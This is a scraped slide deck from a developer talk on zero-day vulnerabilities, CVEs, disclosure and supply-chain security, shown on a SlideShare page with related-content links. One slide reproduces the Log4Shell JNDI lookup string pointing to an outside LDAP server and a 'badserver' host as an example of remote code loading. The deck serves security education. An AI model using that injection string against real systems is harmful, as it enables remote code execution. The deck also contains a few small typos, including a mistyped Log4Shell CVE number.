SlideShare a Scribd company logo
THE UNFOLDING OF A ZERO DAY
ATTACK
CVE 101
@t_mammarella @kadigrigg
THERESA
MAMMARELLA
Software Engineer @ IBM
Eclipse OpenJ9 JVM
Open source developer, community
member and speaker
KADI
MCKEAN
Developer Advocate at Endor Labs
Contributor to It's 5:05 pm
Podcaster
@t_mammarella @kadigrigg
$8 TRILLION
In 2023, the global annual cost of cyber crime is
predicted to top
Source: Security Intelligence
IF CYBERCRIME WAS A
COUNTRY (BY GDP)
China: $14.72 Tr.
Cybercrime: $8.0 Tr.
Japan: $5.06 Tr.
Germany: $3.85 Tr.
United States: $20.89 Tr.
Canada: $1.64 Tr.
Italy: $1.89 Tr.
France: $2.63 Tr.
India: $2.66 Tr.
United Kingdom: $2.67 Tr.
Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
AGENDA
1 SECURITY BASICS
2 VULNERABILITY
TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES
FOR DEVELOPERS
THE BASICS
Vulnerability
Threat
Risk
THE BASICS
Vulnerability
Threat
Risk
x
COMMON VULNERABILITIES AND
EXPOSURES (CVES)
Description
Year
ID
References
NATIONAL VULNERABILITY
DATABASE
CVSS SCORE
METRICS
STORY #1
SO WHAT IS THE BEST
WAY TO TALK ABOUT
VULNERABILITIES?
Private disclosure
Coordinated (responsible)
disclosure
Full (Public) disclosure
HOW DO I DISCLOSE A VULNERABILITY IN A
COORDINATED OR PRIVATE WAY?
Company Website
SECURITY.md
Security files on servers
Github private vulnerability
reporting
ZERO DAY
VULNERABILITY
Security bug or flaw
which is either
unknown to the vendor
does not have an official
patch.
STORY #2
The Zero Day Window is Closing
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
Year of Date Reported
2006 2007 2008 2009 2010 2011 2012 2013 2104 2015
10
20
30
40
50
0
A
v
e
r
a
g
e
D
a
y
s
f
r
o
m
P
u
b
l
i
c
D
i
s
c
l
o
s
u
r
e
t
o
E
x
p
l
o
i
t
Average
45
15
2017 2019 2021
Struts2
${jndi:ldap://ldap.dev:1389/a}
Reference ref = new
Reference(“https://badserver,com");
LOG4J
REMOTE CODE
LOADING: A MAJOR
WEAKNESS?
Remember this?
System Loader
JDNI Loader
All the bad code you want
http://badserver.com
STORY #3:
CVE-2021-4428 AKA
LOG4SHELL
Coordinated
disclosure
Incomplete fix
More CVE's follow
WHAT'S THE DIFFERENCE BETWEEN THESE LINES
OF CODE?
STORY #4
CVE-2022-3786 AND CVE-2022-3602
MOST OF THESE STORIES
ARE UNTOLD
Jeremy Long, founder of the
OWASP Dependency Check
project speculates that
"only 25% of organizations
report vulnerabilities to
users, and only 10% of
vulnerabilities are reported
as Common Vulnerabilities
exposure (CVE)."
Sonatype State of the Software Supply Chain Report 2019
Security Practices for
Developers
INSIDER THREAT
The potential for an insider to use their authorized access or understand of an
organization to harm that organization
When an engineer is compromised by outside influence or dissatisfaction
When an engineer is poorly trained
When engineers put backdoors into a product
When remote development systems are not secured or when protections are
removed
When accounts and credentials for terminated or inactive personnel remain
available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
OUTNUMBERED SECURITY STAFF LEAVES
SOFTWARE VULNERABLE
AppSec Developers
Source: testbytes.net/blog/what-is-a-software-bug
Security
Champions
ORGANIZATIONAL CHANGES
AppSec Developers
Credit: Eddie Knight, Sonatype
THE
MANTRA
01
Does this touch the internet?
If a feature touches the internet, we need to
ensure end-to-end security from the supplier
to the consumer
02
Does this take untrusted input?
If a feature takes untrusted input, we need to
validate it's integrity before use
03
Does this handle sensitive data?
If a feature handles sensitive data, we must pay
special care to encryption, handling, and storage.
HOW FAST IS YOUR
RELEASE PROCESS?
Sonatype: State of the Software Supply Chain
OPEN SOURCE
DEPENDENCY
MANAGEMENT
Dependencies
Dev Tools
Applications
IT'S OPEN SEASON ON OPEN SOURCE PROJECTS
90%
of an application is
open source components
*(Sonatype: State of the Software Supply Chain)
Goal: Add malware and vulnerabilities at 'source'
org.leftpad
vs
org.leftpadd
A lookalike domain,
dependency with one
or two wrong or
different characters
TYPES OF SUPPLY CHAIN ATTACKS
Typosquatting
Open Source
Repo Attacks
Build Tool
Attacks
Dependency
Confusion
Attempts to get
malware or
weaknesses added into
dependency source via
social or tools
Attempts to get
malware into the tools
that are used to
produce
dependencies
Attempts to get a
Different version added
into a binary repository
Often “latest”
com.foo @ v1
com.foo @ v99999
my.internal@v1
LOOKING
THROUGH THE
NOISE
Project Security
Maybe - tools like OpenSSF
Scorecard can help
Fauget University
Graduated in Web Design
WHO CAN YOU TRUST?
Third Party Projects
Open Source Repositories
Not usually
NPM and PyPI are common to supply
chain attacks
Maven Central is better, namespaces and
user validation help prevent attacks
Scanning Tools
Software Composition Analysis
Can be helpful in discovering known
vulnerabilities or even discovering
unexpected binaries
Some false positives
Who is Responsible?
YOU
RECAP
Vulnerability x Threat = Risk
CVE’s, CVSS, disclosure process
The Mantra/OWASP Top 10
Dependency management
Development considerations
@t_mammarella
tmammarella
THANK YOU
JACSKONVILLE
JUG
Linux Foundation free course
OWASP Webgoat
Foojay security posts
Endor Labs Top 10 OSS Risks Report
Developing Secure Software
https://training.linuxfoundation.org/training/de
veloping-secure-software-lfd121/
Hands on with the OWASP Top 10
https://owasp.org/www-project-webgoat/
https://foojay.io/today/category/security/
https://www.endorlabs.com/top-10-open-
source-risks
@kadigrigg
kadi-grigg
its505pm

More Related Content

Similar to JacksonvilleJUG_CVE101.pdf

Code to Cloud Workshop
Code to Cloud WorkshopCode to Cloud Workshop
Code to Cloud Workshop
Jamie Coleman
 
GR - Security Economics in IoT 150817- Rel.1
GR - Security Economics in IoT 150817- Rel.1GR - Security Economics in IoT 150817- Rel.1
GR - Security Economics in IoT 150817- Rel.1
Clay Melugin
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Zivaro Inc
 
Patches Arrren't Just for Pirates
Patches Arrren't Just for PiratesPatches Arrren't Just for Pirates
Patches Arrren't Just for Pirates
webnowires
 
Boosting IoT Protection: An Enterprise Risk Imperative
Boosting IoT Protection: An Enterprise Risk ImperativeBoosting IoT Protection: An Enterprise Risk Imperative
Boosting IoT Protection: An Enterprise Risk Imperative
National Retail Federation
 
Everything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepEverything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeep
Ivanti
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare ☁
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare ☁
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare ☁
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
lior mazor
 
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
IRJET Journal
 
IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
IRJET Journal
 
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
DevOps Indonesia
 
Application security meetup 27012021
Application security meetup 27012021Application security meetup 27012021
Application security meetup 27012021
lior mazor
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
Shah Sheikh
 
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and BeyondHow BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
SecPod Technologies
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0
mobileironmarketing
 
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
apidays
 
Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...
LabSharegroup
 
Becoming Secure By Design: Questions You Should Ask Your Software Vendors
Becoming Secure By Design: Questions You Should Ask Your Software VendorsBecoming Secure By Design: Questions You Should Ask Your Software Vendors
Becoming Secure By Design: Questions You Should Ask Your Software Vendors
SolarWinds
 

Similar to JacksonvilleJUG_CVE101.pdf (20)

Code to Cloud Workshop
Code to Cloud WorkshopCode to Cloud Workshop
Code to Cloud Workshop
 
GR - Security Economics in IoT 150817- Rel.1
GR - Security Economics in IoT 150817- Rel.1GR - Security Economics in IoT 150817- Rel.1
GR - Security Economics in IoT 150817- Rel.1
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
 
Patches Arrren't Just for Pirates
Patches Arrren't Just for PiratesPatches Arrren't Just for Pirates
Patches Arrren't Just for Pirates
 
Boosting IoT Protection: An Enterprise Risk Imperative
Boosting IoT Protection: An Enterprise Risk ImperativeBoosting IoT Protection: An Enterprise Risk Imperative
Boosting IoT Protection: An Enterprise Risk Imperative
 
Everything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepEverything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeep
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
 
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
Manoj Purandare - Application Security - Secure Code Assessment Program - Pre...
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
 
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
IRJET- Windows Log Investigator System for Faster Root Cause Detection of a D...
 
IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
 
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
 
Application security meetup 27012021
Application security meetup 27012021Application security meetup 27012021
Application security meetup 27012021
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
 
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and BeyondHow BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0
 
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
apidays LIVE Singapore 2021 - Why verifying user identity Is not enough In 20...
 
Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...
 
Becoming Secure By Design: Questions You Should Ask Your Software Vendors
Becoming Secure By Design: Questions You Should Ask Your Software VendorsBecoming Secure By Design: Questions You Should Ask Your Software Vendors
Becoming Secure By Design: Questions You Should Ask Your Software Vendors
 

Recently uploaded

SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024
Hironori Washizaki
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
pavan998932
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
Gerardo Pardo-Castellote
 
GOING AOT WITH GRAALVM FOR SPRING BOOT (SPRING IO)
GOING AOT WITH GRAALVM FOR  SPRING BOOT (SPRING IO)GOING AOT WITH GRAALVM FOR  SPRING BOOT (SPRING IO)
GOING AOT WITH GRAALVM FOR SPRING BOOT (SPRING IO)
Alina Yurenko
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
Hornet Dynamics
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
Roshan Dwivedi
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
Drona Infotech
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
Paco van Beckhoven
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
Adele Miller
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
TheSMSPoint
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
Google
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Crescat
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
lorraineandreiamcidl
 

Recently uploaded (20)

SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
 
GOING AOT WITH GRAALVM FOR SPRING BOOT (SPRING IO)
GOING AOT WITH GRAALVM FOR  SPRING BOOT (SPRING IO)GOING AOT WITH GRAALVM FOR  SPRING BOOT (SPRING IO)
GOING AOT WITH GRAALVM FOR SPRING BOOT (SPRING IO)
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
 

JacksonvilleJUG_CVE101.pdf

  • 1. THE UNFOLDING OF A ZERO DAY ATTACK CVE 101 @t_mammarella @kadigrigg
  • 2. THERESA MAMMARELLA Software Engineer @ IBM Eclipse OpenJ9 JVM Open source developer, community member and speaker KADI MCKEAN Developer Advocate at Endor Labs Contributor to It's 5:05 pm Podcaster @t_mammarella @kadigrigg
  • 3. $8 TRILLION In 2023, the global annual cost of cyber crime is predicted to top Source: Security Intelligence
  • 4. IF CYBERCRIME WAS A COUNTRY (BY GDP) China: $14.72 Tr. Cybercrime: $8.0 Tr. Japan: $5.06 Tr. Germany: $3.85 Tr. United States: $20.89 Tr. Canada: $1.64 Tr. Italy: $1.89 Tr. France: $2.63 Tr. India: $2.66 Tr. United Kingdom: $2.67 Tr. Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
  • 5. AGENDA 1 SECURITY BASICS 2 VULNERABILITY TRACKING 3 DISCLOSURE PROCESS 4 SECURITY PRACTICES FOR DEVELOPERS
  • 8. COMMON VULNERABILITIES AND EXPOSURES (CVES) Description Year ID References
  • 11.
  • 12.
  • 14. SO WHAT IS THE BEST WAY TO TALK ABOUT VULNERABILITIES? Private disclosure Coordinated (responsible) disclosure Full (Public) disclosure
  • 15. HOW DO I DISCLOSE A VULNERABILITY IN A COORDINATED OR PRIVATE WAY? Company Website SECURITY.md Security files on servers Github private vulnerability reporting
  • 16. ZERO DAY VULNERABILITY Security bug or flaw which is either unknown to the vendor does not have an official patch.
  • 18. The Zero Day Window is Closing Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016) Year of Date Reported 2006 2007 2008 2009 2010 2011 2012 2013 2104 2015 10 20 30 40 50 0 A v e r a g e D a y s f r o m P u b l i c D i s c l o s u r e t o E x p l o i t Average 45 15 2017 2019 2021 Struts2
  • 19. ${jndi:ldap://ldap.dev:1389/a} Reference ref = new Reference(“https://badserver,com"); LOG4J REMOTE CODE LOADING: A MAJOR WEAKNESS? Remember this? System Loader JDNI Loader All the bad code you want http://badserver.com
  • 21. WHAT'S THE DIFFERENCE BETWEEN THESE LINES OF CODE?
  • 22. STORY #4 CVE-2022-3786 AND CVE-2022-3602
  • 23. MOST OF THESE STORIES ARE UNTOLD Jeremy Long, founder of the OWASP Dependency Check project speculates that "only 25% of organizations report vulnerabilities to users, and only 10% of vulnerabilities are reported as Common Vulnerabilities exposure (CVE)." Sonatype State of the Software Supply Chain Report 2019
  • 25. INSIDER THREAT The potential for an insider to use their authorized access or understand of an organization to harm that organization When an engineer is compromised by outside influence or dissatisfaction When an engineer is poorly trained When engineers put backdoors into a product When remote development systems are not secured or when protections are removed When accounts and credentials for terminated or inactive personnel remain available. Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
  • 26. OUTNUMBERED SECURITY STAFF LEAVES SOFTWARE VULNERABLE AppSec Developers
  • 29.
  • 30.
  • 31. Credit: Eddie Knight, Sonatype THE MANTRA 01 Does this touch the internet? If a feature touches the internet, we need to ensure end-to-end security from the supplier to the consumer 02 Does this take untrusted input? If a feature takes untrusted input, we need to validate it's integrity before use 03 Does this handle sensitive data? If a feature handles sensitive data, we must pay special care to encryption, handling, and storage.
  • 32. HOW FAST IS YOUR RELEASE PROCESS? Sonatype: State of the Software Supply Chain
  • 34. IT'S OPEN SEASON ON OPEN SOURCE PROJECTS 90% of an application is open source components *(Sonatype: State of the Software Supply Chain) Goal: Add malware and vulnerabilities at 'source'
  • 35. org.leftpad vs org.leftpadd A lookalike domain, dependency with one or two wrong or different characters TYPES OF SUPPLY CHAIN ATTACKS Typosquatting Open Source Repo Attacks Build Tool Attacks Dependency Confusion Attempts to get malware or weaknesses added into dependency source via social or tools Attempts to get malware into the tools that are used to produce dependencies Attempts to get a Different version added into a binary repository Often “latest” com.foo @ v1 com.foo @ v99999 my.internal@v1
  • 36.
  • 39. Maybe - tools like OpenSSF Scorecard can help Fauget University Graduated in Web Design WHO CAN YOU TRUST? Third Party Projects Open Source Repositories Not usually NPM and PyPI are common to supply chain attacks Maven Central is better, namespaces and user validation help prevent attacks Scanning Tools Software Composition Analysis Can be helpful in discovering known vulnerabilities or even discovering unexpected binaries Some false positives Who is Responsible? YOU
  • 40. RECAP Vulnerability x Threat = Risk CVE’s, CVSS, disclosure process The Mantra/OWASP Top 10 Dependency management Development considerations
  • 41.
  • 42. @t_mammarella tmammarella THANK YOU JACSKONVILLE JUG Linux Foundation free course OWASP Webgoat Foojay security posts Endor Labs Top 10 OSS Risks Report Developing Secure Software https://training.linuxfoundation.org/training/de veloping-secure-software-lfd121/ Hands on with the OWASP Top 10 https://owasp.org/www-project-webgoat/ https://foojay.io/today/category/security/ https://www.endorlabs.com/top-10-open- source-risks @kadigrigg kadi-grigg its505pm